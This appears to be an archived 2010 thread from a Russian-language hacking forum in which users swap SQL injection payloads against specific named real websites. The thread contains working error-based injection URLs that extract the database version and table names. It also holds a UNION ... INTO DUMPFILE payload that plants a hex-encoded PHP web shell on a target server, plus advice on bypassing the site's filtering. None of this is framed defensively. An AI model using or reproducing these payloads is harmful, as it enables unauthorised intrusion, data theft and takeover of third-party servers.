ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.04.2010, 14:25
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
Нашел самую обыкновенную sql inj и никак не могу составить грамотно запрос. Помогите найти решение.
http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
|
|
|
11.04.2010, 14:36
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+and+substring(version( ),1,1)=5--+
version():
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+or+(select+count(*)+fr om+information_schema.tables+group+by+concat(versi on(),floor(rand(0)*2)))--+
|
|
|
|
11.04.2010, 14:44
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
спасибо все получилось
|
|
|
|
11.04.2010, 14:57
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
поjaлуста помоqите заливать шелл
http://www.fytobell.be/newsitem_show.php?item=-120+union+select+0,0x3C3F696E636C75646528245F47455 45B22636D64225D293B3F3E,2,3,4,5,6,7,8,9+from+mysql .user+INTO+DUMPFILE+%27E:\Inetpub\www.ort-systeem.be\web\mmtools\impuls\sites\fytows\test13. php%27
|
|
|
|
11.04.2010, 16:25
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
Подскажите как отсюда вывести table_name из базы information_schema.tables ?
http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
|
|
|
|
11.04.2010, 17:34
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Deani
Подскажите как отсюда вывести table_name из базы information_schema.tables ?
http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%27+or+%28select+count%2 8*%29+from+information_schema.tables+group+by+conc at%28 table_name,floor%28rand%280%29*%202%29%29%29--+
нубство
|
|
|
|
11.04.2010, 17:45
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
не выводит
|
|
|
|
11.04.2010, 17:50
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Deani
не выводит
Ну просто ппц... реал нубство ты вообще на код смотришь иле тока нажимаешь strg+c и в url strg+v ??
|
|
|
|
11.04.2010, 17:53
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
конечно смотрю! но я не могу получить конкретное значение !
|
|
|
|
11.04.2010, 17:56
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Ну так ты пробелы убери, фильтрация от 1-8 класса.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2063977){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2064033){kind=avatar}
Похожие темы
Линейный вид
